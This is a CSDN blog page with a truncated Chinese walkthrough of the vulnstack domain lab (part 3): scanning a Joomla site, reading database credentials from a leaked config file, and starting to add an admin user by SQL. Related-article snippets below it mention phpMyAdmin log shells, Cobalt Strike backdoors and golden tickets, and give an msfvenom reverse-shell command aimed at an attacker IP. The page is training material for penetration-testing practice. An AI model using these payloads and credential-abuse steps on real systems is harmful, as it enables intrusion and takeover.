vulnstack域环境靶场(三)

最新推荐文章于 2024-06-12 09:13:13 发布
最新推荐文章于 2024-06-12 09:13:13 发布
阅读量810 收藏 1
点赞数
分类专栏: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/109963420
版权

环境搭建

环境配置

打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。

挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。

除重新获取ip,不建议进行任何虚拟机操作。

参考虚拟机网络配置,添加新的网络,该网络作为内部网络。

注:名称及网段必须符合图片,进行了固定ip配置。
在这里插入图片描述

目标:域控中存在一份重要文件。

本次环境为黑盒测试,不提供虚拟机账号密码。

信息搜集

Nmap扫描

使用nmap扫描存活ip,发现有joomla的cms。
在这里插入图片描述

Joomlascan扫描

使用joomlascan进行扫描,发现存在配置文件
在这里插入图片描述

配置文件泄漏

对该页面进行访问得到数据库账户密码
在这里插入图片描述

user:testuser
passwrod:cvcvgjASD!@
尝试连接该数据库
在这里插入图片描述
能够正常连接,使用sql语句对joomla进行添加管理员账户,官方文档:恢复或重置管理员密码

INSERT INTO `am2zu_users
最低0.47元/天 解锁文章
BROTHERYY
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
vulnstack环境靶场(一)
BROTHERYY的博客
11-08 1163
一、环境介绍: 1.拓扑结构 2.环境搭建 这里我多使用了一个win7的虚拟机作为攻击机,使用的vm1网卡。 二、信息搜集 1.敏感信息泄漏 phpinfo默认页面 2.数据库弱口令 3.目录爆破 、漏洞利用 1.利用phpmyadmin日志写入shell 2.利用网站后台getshell 访问该网站以后发现公告信息处有信息泄漏 点击前台模板进入以后点击新建,可以写入一个shell,也可以直接修改当前的模板 不知道目录路径,百度一下yxcms的目录 3.上传cs后门 设置好监听
VulnStack环境靶场渗透(一)
qq_43590351的博客
09-20 1373
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 成员server2003 192.168.52.141 控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
【勒索来袭】vulntarget-n靶场搭建& 打靶流程
crowsec
06-12 1104
vulntarget-n是一个模拟全球化勒索病毒高发环境下的应急响应和取证分析案例,其模拟了一个正常运行的业务服务被勒索病毒攻击的情景
vulnstack环境靶场(四)
BROTHERYY的博客
12-09 1475
环境搭建 进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下: sudo su ubuntu docker-compose build docker-compose up 环境全部开启效果如下: 信息搜集 通过nmap发现主机开启以下服务,访问phpmyadmin属于未授权,直接就登录了 ...
vulnstack系列靶场
aming小老弟
06-09 3037
靶场
vulnstack内网渗透环境靶场-1 大全
鸣蜩十四的博客
08-19 2948
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 这次靶场一共环境,win7,win2003,win2008,win7是web服务器,上面我们需要两张网卡,一张nat模式,一张主机模式,win2003是成员,win2008为控 Win7配置如下: 在win7中使用phpstudy开
VulnStack靶场渗透测试
sweelg的博客
07-08 363
一、信息收集 主机发现 netdiscover -i eth0 -r 192.168.1.0/24 目标IP:192.168.1.136 端口扫描 sudo masscan -p 1-65535 192.168.1.136 --rate=1000 目录扫描 gobuster -m dir -fw -u 192.168.1.136 -w /usr/share/wordlists/dirb/big.txt -t 50 看到有个phpMyAdmin 访问有弱口令root root
【内网渗透】vulnstack第二个靶场
m0_58236911的博客
04-29 471
本文为个人在练习红日安全vulnstack系列的第二个靶场时所写笔记,希望对大家能有所帮助,若有疑问,欢迎提出交流,敬请各位批评指正!进入C:\Oracle\Middleware\user_projects\domains\base_domain目录,也可以使用 CobaltStrike自带的提权插件,提权手段很多这里不举例。右击会话—jump—psexec64(PC为32位,需要使用psexec)模拟外网网段:192.168.111.0/24。权限维持有多种途径,这里采用的是黄金票据。
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 847
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
VulnStack靶场6
weixin_45568454的博客
11-04 255
打靶日记之VulnStack记录 记下了好多踩过的坑 以及一些小的心得体会
webshell获取总结-cookices和dedecms靶场环境
最新发布
06-12
、产品管理:产品类别新增修改管理,产品添加修改以及产品的审核。四、询价管理:查看询价的详细信息及询价处理。 五、下载中心:可分类增加各种文件,如驱动和技术文档等文件的下载。六、会员管理:查看修改删除...
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领中,靶场扮演着重要的角色,尤其是在网络安全领靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
DVWA靶场环境依赖文件
10-11
该文件来着官网下载,需要的uu可以下载,方便DVWA靶场环境搭建
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
漏洞原理+靶场环境+exp等.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领中,靶场扮演着重要的角色,尤其是在网络安全领靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
Pikachu 通关笔记
BROTHERYY的博客
06-24 9642
Pikachu 靶机练习 一、暴力破解 1.基于表单的暴力破解 抓包,加载字典。 2.验证码绕过(on server) 3.验证码绕过(on client) 4.验证码绕过(token 防爆破) 通过测试发现每个数据包的token在变化,尝试使用pitchfork进行爆破 具体设置如下: 选择pitchfork进行爆破,添加密码和token变量 因为token的变化需要修改线程数 在Grep - Extract 选项添加参数 在页面最低部找到always选项 回到payloads模块 正常
DVWA全系列笔记
BROTHERYY的博客
08-21 5157
文章目录一、DVWA的安装二、漏洞学习2.1 Brute Force2.1.1 Brute Force(low)2.1.2 Brute Force(Medium)2.1.3 Brute Force(High)2.2 Command Injection(命令注入)2.2.1 Command Injection(Low)2.2.2 Command Injection(Medium)2.2.3 Command Injection(High)2.3 Csrf(跨站请求伪造)2.3.1 Csrf(Low)2.3.2
ms08067实验室web靶场-Command
BROTHERYY的博客
09-28 831
打开环境与dvwa的命令注入有点像 这里过滤了很多,尝试用%0a来突破 能够正常执行命令以后,到根目录去寻找flag 直接cat读取flag 得到flag MS08067{0d07a0895471478280dd7effeb530ae7}
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值